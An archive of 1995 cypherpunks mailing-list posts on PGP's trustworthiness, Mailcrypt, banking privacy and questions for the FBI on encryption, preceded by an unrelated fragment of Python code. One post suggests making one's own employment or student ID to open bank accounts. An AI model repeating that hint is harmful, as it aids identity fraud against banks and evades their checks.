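    root = "RSA-in-4-lines"
    print("trusted base :", sorted(trusted_base(deps, root)))
    print("taken on faith:", sorted(unjustified(deps, root)))
    for layer in ("hardware", "Unix", "Perl_Algorithms"):
        print("if %s is faulty: %s"
              % (layer, sorted(undermined_by(deps, layer))))
```

Four readable lines of Perl sit on eleven other components here, five of which appear only on the right-hand side of the statements.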

 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cam.ov.com>
Date: Tue, 1 Aug 95 12:22:58 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
Message-ID: <199508011923.PAA17989@dun-dun-noodles.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain


So Dr. Cohen, what do you use when you want to send a message across
the Internet with better security than cleartext?  What do you
recommend to others?

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Mon, 31 Jul 95 22:51:57 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
In-Reply-To: <9508010250.AA14743@all.net>
Message-ID: <199508010544.PAA07308@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello fc@all.net (Dr. Frederick B. Cohen)
  and mab@crypto.com (Matt Blaze)
  and cypherpunks@toad.com

I'm afraid I missed the start of this thread, sorry if I'm repeating...

...
> The fact is, you seem to support the idea that PGP is secure without a
> reasonable basis, and when pushed a bit harder, agree that it probably
> is not secure. 

The problem is that "secure" is not really something that can be proved.
(I'm not sure if that's a theoretical or a practical fact, but it remains.)
For one thing, I'm not even sure the RSA algorithm itself is secure.
(At least I've never heard of a proof; have you?)

As long as I'm using PGP to send letters to grandma, the cost (to me) of
a successful attack is small. I therefore expend little effort to verify
that it is secure.

If/when I start to use it for more serious applications, I will read 
the source code. I might even modify it (eg. accord less entropy per
keystroke) if I'm not happy with it.

If circumstances warranted, I could re-implement it from the appropriate
RFC (is it out yet or still draft?). However, in such circumstances,
I very much suspect a one-time-pad would be used.

> This is how professionals deal with these sorts of questions:
> 
> 	If you do not believe it is secure, you should say why not.

I do not believe that it can be proven secure.

> 	In my case, I question its security and have given at least one
> 	example of how it could be insecure.

If you doubt the key-gen routine:
  * you are certainly free to make up your own keys any way you like,
  * write your own and argue that it's better, and/or
  * find a way to break the key-gen routine.

> 	If you do believe it is secure, you should be able to support
> 	your contention with more than reference to RFCs, vague
> 	comments, and claiming that you have read the code and didn't
> 	catch anything.

Adding to the list:
  * I've never heard of anyone catching anything (except the headers on
clearsigned messages problem).

> 	If you cannot specifically address my question, say so, tell us
> 	all that the security of PGP is an open question, and either
> 	leave it open or go after closing it.

The security of anything is an open question.

You shouldn't spend more on proving security than a breach would cost.


Hope I'm making sense...

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Tue, 1 Aug 95 13:00:16 PDT
To: cypherpunks@toad.com
Subject: ANNOUNCEMENT: Mailcrypt 3.3 for GNU Emacs
Message-ID: <199508011959.PAA00818@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mailcrypt version 3.3 is now available.

Mailcrypt is an Emacs Lisp package which provides a simple interface
to message encryption with PGP.  (You do use Emacs to handle your mail
and news, right?)

Features: Encryption, decryption, signing, adding keys, extracting
keys, passphrase caching with timeout, multiple secret key (identity)
support, a simple but flexible interface to Cypherpunk remailers
(including chaining, response blocks, pseudonyms, and Mixmaster
support), and an automatic keyserver interface via HTTP.

*We* think it's the best interface to these functions anywhere, but
then again, we're biased.

The NEWS file is appended to this message.

Obtain it through the Mailcrypt home page at

	http://cag-www.lcs.mit.edu/mailcrypt/

or from the FTP mirror at

	ftp://cag.lcs.mit.edu/pub/patl/

and enjoy!

 - Patrick J. LoPresti (patl@lcs.mit.edu)
 - Jin S. Choi (jin@atype.com)
   Tue Aug  1 15:00:27 1995 -0500

======================================================================

Noteworty changes in Mailcrypt version 3.3:

Numerous minor bugs have been fixed.

Mailcrypt now requires at least FSF Emacs version 19.28 or XEmacs
version 19.12.  Sorry, but anything else is too annoying.

Support has been added for reading mail under (ding) GNUS.



Noteworthy changes in Mailcrypt version 3.2:

Mailcrypt now uses "start-process" instead of "call-process-region" to
run PGP; this uses a pipe instead of a temp file for various inputs,
including your passphrase.  Ahem.

All Mailcrypt commands now start with the prefix `C-c /' to bring
Mailcrypt into line with documented GNU standards.

`mc-insert-public-key' is now bound to `C-c / x' (an in "extract")
instead of `C-c a'.

`mc-deactivate-passwd' is bound to `C-c / f' (as in "forget").

`mc-read-mode' and `mc-write-mode' are now full-blown minor modes.  So
you can do, for example, `M-x mc-install-write-mode' from a Text mode
buffer and have the normal encryption and signing commands available.
The keymaps for the modes are configurable variables.

Interactive commands `mc-encrypt-region', `mc-sign-region', etc. are
now defined.

If you use RMAIL and you say no to "Replace encrypted message with
decrypted?", you will be dropped into RMAIL mode for viewing.

RMAIL summary mode is now supported.

Documentation in the form of a Texinfo file is now part of the
distribution.

Mailcrypt can now fetch a needed key from finger, HTTP, or any of a
list of locally stored keyrings.  `C-c / k' initiates a fetch
manually; Mailcrypt will offer to initiate one automatically as
appropriate during encryption or signature verification.

The remailer functions now support Mixmaster.

`C-c / d' can handle conventionally encrypted messages.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMB6GjHr7ES8bepftAQGXLQP/W4sWXEWficWMlQ340StWd+RC5pJmFh4d
9jlAodH/Gmv1slPmJy21WDPqeyp+3z5BJ8BUgz98e7rqooZ3tB7Fy6cT4Q3UJ0Gv
+WZQBkNV4tT7bNjCQxjIE3QrowGBeko0CZIMwGlRujioguHMgHcm8XTJO37ZuypB
Sn24f/uPkGc=
=8f59
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 1 Aug 95 13:19:33 PDT
To: marc@cam.ov.com (Marc Horowitz)
Subject: What do I use?
In-Reply-To: <199508011923.PAA17989@dun-dun-noodles.cam.ov.com>
Message-ID: <9508012013.AA14958@all.net>
MIME-Version: 1.0
Content-Type: text


> So Dr. Cohen, what do you use when you want to send a message across
> the Internet with better security than cleartext?  What do you
> recommend to others?

I use different techniques when different levels of protection are
required, and I definitely don't use the Internet for anything that is
really vital because of the ease of gaining intelligence indicators
based on traffic analysis.

I commonly use FAX machines from non-fixed locations for point-to-point
communications where I don't want it to be tapped from my end.  I often
use telephone lines with modems for other secure communications
depending on the requirements.  I have used DES for some limited items
with the key sent over a separate channel, RSA for short time-limited
secure messages, one-time-pads for certain really critical stuff between
myself and a single other trusted party, special secure telephones as
required by organizations for select communications, various custom
ciphers for communication with parties who have special requirements,
dictionary and codebook ciphers on rare occasions, wheel ciphers of
various sorts, a variety of custom authentication ciphers, and who knows
what else. 

I never recommend a solution without knowing a fair amount about the
specific challenge it is supposed to address.  I typically start with an
understanding of the general environment, the financial and/or human
issues, the threat profile, the protection environment, the other
dependencies and protection factors, and other factors related to the
reasons for protection.  Once I have this understanding, I make value
judgements about how much I trust things relative to the requirement for
trust and other limitations presented by the situation.

Sorry I can't give you a pat answer like "I use Joe's Cryptobox", but
that's just the way it is.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 1 Aug 95 13:46:57 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: US vs Overseas Banks
Message-ID: <199508012016.QAA15599@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:05 PM 7/30/95 -0400, Lucky Green wrote:

>Six years ago, you could walk into a Bank, show them your driver license,
>and open an  account.
>Today, you need several pieces of ID.
>Three years ago, you could withdraw money from your own account without
>having  your checkbook on you.
>Today, they make you pay for a "counter check".
>One year ago, you could walk into a bank and cash a check drawn onto an
>account at the very same bank.
>Today (Coast Federal), they make you pay a $10 check cashing fee.

This depends on location.  The Feds require that banks use the same ID to
open an account that they would require to cash a check.  The banks on the
Left and Right Coasts are fairly restrictive (more restrictive than they
have to be).  Banks in the Heartland (particularly the Intermountain West)
are much easier.

With a little work, it is still possible to open accounts with "soft" ID in
the more relaxed regions.  Since these banks are accessible by ATM and Fedex
and will soon be on the net (in some cases), they can be convenient to use.
Likewise Canadian banks (which routinely offer US$ accounts).  In the soft
ID category, I place Employment ID and Student ID which you are free to make
yourselves as well as the new secured credit cards; some of which can be
obtained in spite of one's lack of existence.  The latter make very good ID.

>The US banking industry has gone to the dogs. The day a non-US bank offers
>an account that can be accessed over the net will be the day I close my US
>accounts.

This will be the most interesting story of the next few years.  I will be
anxious to see if the new ease of "switching" money reverses the trend
toward decreased financial privacy caused by the war on money laundering.

DCF

"If Work, Jobs, Income, and the Middle Class Dream are all over, how come
more Americans and a higher proportion of Americans are now in paid
employment than ever before in our history."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cam.ov.com>
Date: Tue, 1 Aug 95 13:36:30 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: What do I use?
In-Reply-To: <9508012013.AA14958@all.net>
Message-ID: <199508012037.QAA18078@dun-dun-noodles.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9508012013.AA14958@all.net>, fc@all.net (Dr. Frederick B. Cohen) writes:

>> I never recommend a solution without knowing a fair amount about the
>> specific challenge it is supposed to address.  I typically start with
>> an understanding of the general environment, the financial and/or
>> human issues, the threat profile, the protection environment, the
>> other dependencies and protection factors, and other factors related
>> to the reasons for protection.  Once I have this understanding, I make
>> value judgements about how much I trust things relative to the
>> requirement for trust and other limitations presented by the
>> situation.

Ok.  IMHO, that's a perfectly valid position.  Under what
circumstances do you consider pgp to be a suitable tool?  Do you think
there is a better tool under similar circumstances?

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Tue, 1 Aug 95 14:53:28 PDT
To: cypherpunks@toad.com
Subject: Provably Correct Crypto?
In-Reply-To: <9508011911.AA11465@all.net>
Message-ID: <199508012149.AA26006@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



Hmm. Instead of "vetting" the PGP PRNG code, as Dr. Cohen has been
trying to tell me in private email is several programmer-years worth
of work, perhaps I should just write my own version of the PRNG using
the algorithm as defined in whitepapernumberwhatever.

If there are artificial "bugs" to throw off the PRNG currently in the
PGP MIT code, they ought to simply not work right with the code I
write independently and therefore cause a crash or something.

Or perhaps just rewrite the program to use plain arrays instead of
pointers. ;-)

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Tue, 1 Aug 95 14:58:06 PDT
To: fc@all.net
Subject: What do I use?
In-Reply-To: <9508012013.AA14958@all.net>
Message-ID: <199508012153.AA26490@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: fc@all.net (Dr. Frederick B. Cohen)
   Date: Tue, 1 Aug 1995 16:13:09 -0400 (EDT)
   X-Mailer: ELM [version 2.4 PL22]
   Content-Type: text
   Content-Length: 1941      
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   > So Dr. Cohen, what do you use when you want to send a message across
   > the Internet with better security than cleartext?  What do you
   > recommend to others?

   I use different techniques when different levels of protection are
   required, and I definitely don't use the Internet for anything that is
   really vital because of the ease of gaining intelligence indicators
   based on traffic analysis.

So you don't trust the remailers? Is this because you don't trust the
remailer implementations or because you don't trust digital mixes in
the first place?

   I never recommend a solution without knowing a fair amount about the
   specific challenge it is supposed to address.  I typically start with an
   understanding of the general environment, the financial and/or human
   issues, the threat profile, the protection environment, the other
   dependencies and protection factors, and other factors related to the
   reasons for protection.  Once I have this understanding, I make value
   judgements about how much I trust things relative to the requirement for
   trust and other limitations presented by the situation.

Actually, it sounds like you don't use anything that can be used by
someone not a professional old-time cryptographer.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 1 Aug 95 14:03:18 PDT
To: marc@cam.ov.com (Marc Horowitz)
Subject: Re: What do I use?
In-Reply-To: <199508012037.QAA18078@dun-dun-noodles.cam.ov.com>
Message-ID: <9508012054.AA17294@all.net>
MIME-Version: 1.0
Content-Type: text


> >> I never recommend a solution without knowing a fair amount about the
> >> specific challenge it is supposed to address.  I typically start with
> >> an understanding of the general environment, the financial and/or
> >> human issues, the threat profile, the protection environment, the
> >> other dependencies and protection factors, and other factors related
> >> to the reasons for protection.  Once I have this understanding, I make
> >> value judgements about how much I trust things relative to the
> >> requirement for trust and other limitations presented by the
> >> situation.
> 
> Ok.  IMHO, that's a perfectly valid position.  Under what
> circumstances do you consider pgp to be a suitable tool?  Do you think
> there is a better tool under similar circumstances?

That's a tough one.  I generally follow the supreme court's view of not
handling hypotheticals, but I will give you some ideas about my view. 

I think that PGP is almost always suitable for casual conversation that
is to be kept from casual snooping.  Without specifically recommending
its use in any particular situation, I generally think that it is
suitable for select applications where:

	- The threat profile does not include well-funded professional
	cryptanalysts, police agencies, governments, serious financial
	rivals, criminals, or other high-grade threats. 

	- The implications of corruption, non-delivery, repudiation,
	or traffic analysis are not extremely important.

	- The implications of leakage aren't financially or otherwise
	catastrophic. 

	- No lives are at stake.

	- My reputation doesn't depend on it. 

I think that PGP is an excellent tool in many ways, however, I have
numerous difficulties with the lack of adequate interface to it in other
packages.  I am not really keen on its keyring concepts and other
similar things, but that's not a real issue in this frame of reference. 

I have serious concerns about the fact that use of this system does not
prohibit people who are not knowledgeable about the limitations of
public key cryptography from using it in ways that may result in the
revelation or weakening of private keys or other similar potential
problems.  For that reason, I would not advise the use of PGP for any
non-casual application outside of the context of a comprehensive
information protection program designed to provide assurance of its
proper generation, configuration, installation, application, and use.

There are almost certainly other concerns that I would express in an
evaluation for any particular purpose.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Tue, 1 Aug 95 14:20:33 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Attacks on PGP
In-Reply-To: <ac42d74b05021004a9dd@[205.199.118.202]>
Message-ID: <199508012119.RAA23424@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Things are heating up between Fred Cohen and some of the rest of the list.

Were it not for the fact that others are doing the job better than I,
I'd be compelled to enter into the fray myself...

> I've long appreciated Fred Cohen's work on viruses,

And frankly, I've long been forced to install filtering on virtually
every list "Dr." Cohen shows up on. He rarely has much of value to say
-- he also frequently gets kicked off of mailing lists for being a wee
bit too explicit in the advertising hype for his services he puts up on
virtually every mailing list he enters -- be it firewalls, bugtraq, or
whatever.

I considered, as I said, entering this fray early. Fortunately, "Dr."
Cohen has managed to demonstrate his capacity to alienate without my
having to warn anyone about it in advance.

This is not to say that I think PGP couldn't use enhanced scrutiny, or
that all of "Dr." Cohen's comments are always completely meritless.
However, "Dr." Cohen rarely enhances the conversations he's a part of.

Perry

PS I'm sure he has a real PhD. It's just that the other couple dozen
PhDs on this mailing list don't seem to insist on rubbing it in
people's noses constantly -- ditto for all other mailing lists I've
seen him on.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Tue, 1 Aug 95 18:03:33 PDT
To: cypherpunks@toad.com
Subject: Billing for internet usage
Message-ID: <9508020106.AA16898@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain



From time to time there is noise about billing for information transfer 
on the internet.  Historically, it cost more to do the billing calculations
than it was worth, yet you still hear about people wanting to figure out
how.

One way would be to perform cooperative billing balances between nodes,
and allow each node to 'bill upward'.   This means that any two machines
are more interested in their relative balance than how much money they
are really spending.   There are some interesting problems of trust and
reliability, that might be solved through the use of digital money.

Then there is the wily programmer (or machine) that applies expert
solutions to the problem trying to 'route' around billing imbalances.

With sophisticated enough algorithms such machines would be basically
trading on billing futures, perhaps demonstrating that computers could
be better capitalists than people.

Imagine a communications network that collapses because of an economic
crash.

Would the internet require the equivalent of suspension of programmed
trading (routing) and a FTC?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@linknet.kitsap.lib.wa.us>
Date: Tue, 1 Aug 95 18:08:28 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: There's a hole in your crypto, dear Eliza dear Eliza...
In-Reply-To: <199508010354.AA20144@tyrell.net>
Message-ID: <Pine.SUN.3.91.950801175557.15647B-100000@linknet.kitsap.lib.wa.us>
MIME-Version: 1.0
Content-Type: text/plain


How do I know PGP IS secure? I don't. That doesn't mean I don't use it or 
don't trust it. PGP was designed and written by a human, who by its nature
is NOT infallible. The name says it all.... PRETTY GOOD; not REALLY GREAT 
or UNCRACKABLE, just pretty good. 
I think the simple fact that I am not in jail (Knock on wood....) attests 
to the fact that the algorithm, RNG, works Pretty Good. (There's them 
there words again) 
 
-----------------------------------------------------------------------------
JUSTICE: The outcome of NOT protecting people from the results of their 
own folly.
-----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 1 Aug 95 18:34:35 PDT
To: cypherpunks
Subject: NRC Panel, Law Enforcement questions
Message-ID: <9508020134.AA07797@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


To: gnu, crypto@nas.edu (Herb Lin)
Date: Tue, 01 Aug 1995 18:07:59 -0700
From: John Gilmore <gnu@toad.com>

This is more organized.  Let me know if you want any more work done on it.

	John Gilmore
	for the Cypherpunks

POLITICAL PROCESS

It appears that law enforcement bureaucrats (such as Mr. Freeh) are
seizing on irrelevant publicity in order to push their agendas.  An
example is in using the Oklahoma bombing to lobby Congress for the
authority to limit the use of encryption (encryption played no part in
the Oklahoma bombing).  This makes the FBI/DoJ position look like it
can't actually support itself on the facts.  If the facts would
support you, why use irrelevant publicity INSTEAD of real facts?

Why does the FBI refuse to reveal its political manipulations on this issue
to the public?

Agent Kallstrom asked rhetorically at the Clipper debate held at the
New York City Bar Association if the audience would want key escrow if
a daughter of theirs had been kidnapped to make a snuff pornographic
film.  Official Bureau records indicate that such films are at the
very least extremely rare and probably nonexistent. Why do Bureau
spokesmen use graphic description of non-existent crimes as a way of
whipping up public sentiment for key escrow?  Is it the opinion of the
bureau that Clipper would be of use in most kidnapping cases, given
that probable cause to issue a wiretap warrant would probably also be
sufficient to get a warrant to search the premises of the perpetrators
for the victim?  Does the Bureau feel that Agent Kallstrom's comment
was an appropriate way to conduct a reasoned discussion?

Give a precis of the top fifty violations of civil rights or the
political process by the FBI since 1950.  Rank them by magnitude of
the intrusion and by the number of people directly affected.  For
example, the FBI campaign against the Free Speech Movement's right to
speak and petition the government; the McCarthy era; the campaign
against CISPES; COINTELPRO; against civil rights organizations;
political assassination (e.g., Fred Hampton).

How did Mr. Hoover stay in power for his 40-year reign?  Be specific
about the threats that might have removed him from absolute leadership
of the FBI, and what steps he took to counteract these threats.

Detail all political figures, including everyone ever elected to
Congress, every President, every Cabinet-level officer, and every
judge at all levels, who have been subjected to wiretaps or any other
kind of covert surveillance by the FBI or any other agency in the
Executive Branch.  Estimate how many records of such surveillance have
been destroyed.

Detail all cases in which political figures were pressured,
threatened, blackmailed, or simply "informed" or "implied to" about
their covert surveillance.  What prompted these actions against
political figures, and what results did they have?

Why should we trust the FBI to "not listen in" when it has the
technical capability to do so, a history of having done so for reasons
inimical to democratic governance, and a bureaucratic appetite for
power, money, and control?

What five things about your agency would the American public be most
surprised to learn?  Most pleased?  Most displeased?  What five things
about your agency would Congress be most surprised to learn?  The
President?

Do the domestic LEAs (law enforcement agencies), or their agents,
monitor the various crypto/net security and TLA forums on the Net?  If
so, which and by what legal authority?

Do LEAs, or their agents, log the names of posters to the crypto/net
security and TLA forums?  If so, by what legal authority?

Do LEAs, or their agents, monitor non-governmental crypto/net security
wizards?  If so, who and by what legal authority?

Do LEAs use crypto/net security industry informers?  Names?

Do LEAs run stings in crypto/net security, among crypto/net security
zines, orgs, corps, manufacturers?  Targets, names, dates, locations?

Do LEAs have confidential crypto/net security-access agreements with
software and hardware corps.  Names?

Do LEAs run agents-provocateurs in crypto/net security?  Names,
locations?

Do LEAs, or their agents, sniff the Net for crypto -- periodically,
continually?  How, where, who?

Do LEAs, or their agents, sniff remailers?  Which?

Do LEAs, or their agents, run remailers?  Which?

Does Federal policy allow law enforcement agents to purport to run an 
anonymous remailer, e.g. as part of a sting operation?


LAW ENFORCEMENT POLICY

As the FBI sees it, describe the proper place and powers of a national
law enforcement organization in an open society, without regard to
today's laws, court decisions, or the Constitution.  If we were
forming a new country, and could make it up as we went along, what
national law enforcement structure and powers would contribute the most
to our society?

Rank in order of priority, according to agency policy:
	--  National security
	--  Threats to a specific group or individual
	--  Constitutional rights of citizens
	--  Statutory rights of citizens
	--  Statutory limits on the activities of agencies
	--  Constitutional limits on the powers of government
	--  Democratic oversight and accountability
	--  Budgetary considerations
	--  Maintaining secrecy
	--  Prosecution of a criminal
	--  Preventing a crime
	--  Prosecuting or impeding a criminal organization
	--  Exposure of corruption within government
	--  Exposure of corruption within private industry
	--  ... ?
In what order would your agency sacrifice each of these to pursue or
preserve another?  Give examples from actual cases wherever possible.

Does the FBI five-year FOIA backlog render it a secret national police
organization?  How can a law enforcement organization be answerable to
its citizens if they cannot determine what it is doing until five years
later?

How does a law enforcement organization such as the FBI justify
breaking the law itself, by systematically withholding non-exempt
documents requested by citizens under the FOIA?

What effect have anti-drug efforts over the last 30 years had upon the
traditional roles of intelligence and law enforcement?

To what extent is drug trafficking considered of interest to intelligence
organizations?  Why?  Be specific.

Wiretaps can be used by the police to obtain both evidence and
intelligence.  By "evidence" I'm referring to information which can be
presented in a courtroom.  By "intelligence" I mean information which
is not presented in the courtroom, but which might be helpful to law
enforcement in other ways.  As citizens, our main protection against
illegal wiretaps is our ability to have improperly acquired evidence
thrown out of court.  What protection do we have from other illegal
wiretaps -- surveillance designed to gather intelligence, not
evidence?  Who oversees the police and the FBI to make sure that they
follow the rules?  How do we know that law enforcement people don't
use illegal wiretaps to go "fishing"?

What is the relationship between the FBI's campaign to limit or
eliminate the exclusionary rule and its campaign to increase its
technical capabilities for wiretapping?  It seems that the combination
of these initiatives would result in the FBI being able to perform and
`get away with' massive intrusions into personal privacy, for
illegitimate reasons, even if they were later judged to be in
violation of law or the constitution.

What is the FBI's opinion on the optimal level (from their point of
view) of wiretapping/surveillance if money were no object?  How many
wiretaps would the Bureau execute per year if it could do exactly
as it desired, without budgetary or court-imposed restraints?

What trends does the government foresee in the expected cost of
wiretaps in the future? 

Does the DoJ expect that the number of wiretaps and electronic
surveillances will go up if the cost (currently high) goes down?

What do the FBI and its ilk know about using tracking technologies
such as video cameras, road pricing sensors, and other alternatives to
conventional electronic surveillance?

What do the FBI and its ilk know about the use of mechanical aids to
wiretaps (such as voice recognition technology for keywords;
voiceprint recognition to ID wanted suspects)?

Has your agency ever exchanged intelligence with governments of other
countries?  Specify.

Has your agency ever exchanged technology with governments of other
countries?  Specify.

Has your agency ever given non-public technology to a private corporation?
Specify.  How are the beneficiaries of such gifts selected?

How frequently has your agency provided non-public information to
private organizations (such as corporations)?  How frequently have you
refused to do so?  Who, when, where and why?  Does your agency expect
to serve private clients in the foreseeable future, either directly or
indirectly?  How is policy formed on this issue?  How are
beneficiaries selected?

The burgeoning of privatization of domestic "intelligence"-gathering
has blossomed as LEAs' activities have been diminished and as foreign
targets for TLAs have been reduced.  As the need for their services
has dropped, ex-TLA-employees have moved to security, investigative
and "anti-terrorist" firms and public service organizations.  Knoll
Associates, Wackenhut, Kissinger Associates, say, or the welter of
organizations and firms in the tri-coastal, Great Lakes and DC-beltway
regions, often benefit from continuing close contact with former
colleagues who remain active in TLAs.  TLAs could easily pass
prohibited current intelligence to the domestic private market,
paralleling their use of front organizations internationally.  Today,
information on militia groups is being provided by private
organizations, sometimes in the same forum as the officials who cannot
admit to surveilling those targeted groups.  E.g. the Charlie Rose
Show from April, 1995, featuring James Fox (former NYC FBI SAIC).
Also, a NY Times piece on April 24, 1995 gives capsule descriptions of
several "right wing movement" sites and groups, and credits the
material to a mix of private and public organizations.  The
intelligence-gathering, tracking and surveilling of dissident groups,
of all persuasions, by private means -- for profit, for ideological or
for humanitarian reasons -- is a provocative, perhaps civil
liberties-threatening, development, a heritage of the national
security culture, wherein a large number of very able people and
techniques and knowledge and equipment and organization, seem to be
shifting inexorably to new markets of ready, frightened consumers.  As
your agency campaigns for more intrusive surveillance technology and
methods, what impact on society do you foresee as the people who know
these technologies and methods move into the private sector, where
there are fewer rules and easier ways to avoid being caught?


CIVIL RIGHTS

Does the FBI believe that citizens have the right to use whatever
encryption system(s) they desire to use?

Does the FBI believe that the FBI has the right to use whatever
encryption system(s) it desires to use?

Does the FBI believe that private citizens who have special needs or
duties to protect confidential or privileged information -- e.g.,
lawyers, doctors, psychologists, accountants, financial advisors,
bankers, security advisors -- have the right to use whatever
encryption system(s) they desire to use for their own legal, ethical,
or business reasons?

Does the FBI believe that ordinary private citizens who do not belong
to a privileged class have less of a right to use whatever encryption
system(s) they desire to use than do lawyers, doctors, accountants,
financial advisors, bankers, or security advisors?

Does the FBI believe that members of non-mainstream religious groups
or "cults" have the right to use whatever encryption system(s) they
desire to use in transmitting their religious or political beliefs?

Does the FBI believe that individuals who believe strongly in their
rights under the First and Second Amendments to the Constitution have
the right to use whatever encryption system(s) they desire to use?

If wiretap or surveillance is really illegal, then the info gleaned is
likely tainted.  The problem isn't that the rules don't prohibit agencies
from doing it.  The problem is that there isn't an effective mechanism
to detect cheating.  Suppose the FBI puts an illegal wiretap on
someone, and finds out that they're going to commit a crime.  When the
crime takes place, they're on the scene.  How did they know?  "An
anonymous tip", or simply that the officer happened to be there.  How
can you prove it was something different?  An illegal wiretap could be
used to get hints on where admissible evidence can be `independently'
gathered.  Or what if they don't find evidence of a crime, and they
leave the guy alone?  His privacy's been violated illegally.  I once
spoke with someone from INS who told me that random surveillance on
certain people is done.  He told me that there are lists of people who
get "dropped in on" from time to time, mostly people who have had some
sort of drug problems with the police.  Other people might get on the
list by being friends with someone already on the list, with
"friendship" being determined by telco records.  So if you call
someone on the list often, you might end up there yourself.  How
should we protect society against LEA `cheating' in a
clipper/digital-telephony world?

I worked for several years lobbying at INS and DOJ on business
immigration issues, and INS is hardly the bastion of proper police
procedures... Not to mention the fact that aliens have fewer rights
than citizens of the US. INS gets away with a lot of illegal stuff
because on the whole the alien won't litigate the circumstances of
their being caught, because they're too busy fighting the deportation
itself... that is if they even bother to hire an atty.  Aliens in
exclusion proceedings don't even have the right to counsel and in both
exclusion and deportation the burden of proof lies not with the
prosecution, but the defense (guilty until proven innocent).  For
example, the first thing an alien gets in the deportation process is
the OSC, the Order to Show Cause why they shouldn't be
deported...which presumes that they're deportable.  INS gets away with
a lot of crap because there are several legal limbo zones at play.
How can we protect aliens and suspected aliens' civil rights if law
enforcement agencies are given broader powers to make illegal
searches?

In drug cases there is massive and flagrant fabrication of informants.
Judges have been winking at this for some time.  If they need an
"informant" they will pull some petty crook out of stir, and tell him
if he reads his lines right, they will let him go.  Sometimes the same
"informant" turns up in case after case, even though the cases have no
connection with each other.  Are these fabricated informants to cover
up illegal wiretaps?  Or is it 100% fabrication, such as cases where
someone is merely suspected rather than known (on the basis of
illegally obtained evidence) to have committed a crime?  How can this
be avoided if we give increased wiretapping powers?

The ACLU won a court case which forced the LAPD to stop political
surveillance of civilians.  This surveillance had been going on for
decades, it simply came out in the 80s.  The book "The Squad," by
Michael Milan, 1989 covers it.  Much of the material has also been
covered by Dave Emory in his radio broadcasts.  There's also a book
called something like "LA Secret Police" or "Los Angeles Secret
Police".  A newspaper article stated that, just before they were
required to destroy the files, the LAPD intelligence unit had given
copies of all the files to an ex-cop who now ran a private right wing
intelligence clearing house.  He put them all in a database and made
them available to other groups like the B'nai Brith.  That cop was
hunted down, and either was extradited or self-surrendered for trial.
The San Francisco Chronicle covered it pretty well.  This was "Western
Goals."  The Association of Chiefs of Police moved *its* files
offshore a few years back to avoid U.S. laws about such police data
bases.  If LEAs are given more power to invisibly search citizens,
legally or illegally, how would you prevent the information obtained
by ILLEGAL searches from being retained or passed into private hands?

Is caller ID blocking (*67) effective when calling the police?  Or can
the police determine the calling phone, location, or identity anyway?

On the other hand, in some states police have lobbied for the power to
provide fake Caller-ID on calls _from_ the PD.  They claimed it was
necessary to handle undercover investigations.  Why should police agencies
be given the power of anonymity when ordinary citizens cannot be trusted
with it?


MOTIVATION FOR ENCRYPTION CONTROL

Why does the FBI *really* want to control encryption?  It clearly has
nothing to do with terrorism.  The palpable fear among the citizens is
that it has a lot to do with social control, enforcement of narrow
morality, decreased civil rights, increased federal agency authority
and budget, and authoritarianism.

Why is the FBI so upset about encryption?  What real-world events have 
caused this upset?  Or is it a case of "we think it's coming so we are
starting the political machinations now"?

HISTORY - WIRETAPS AND ENCRYPTION

If a legal wiretap encounters encrypted communications, detail what
steps are taken to try to decrypt the communications.

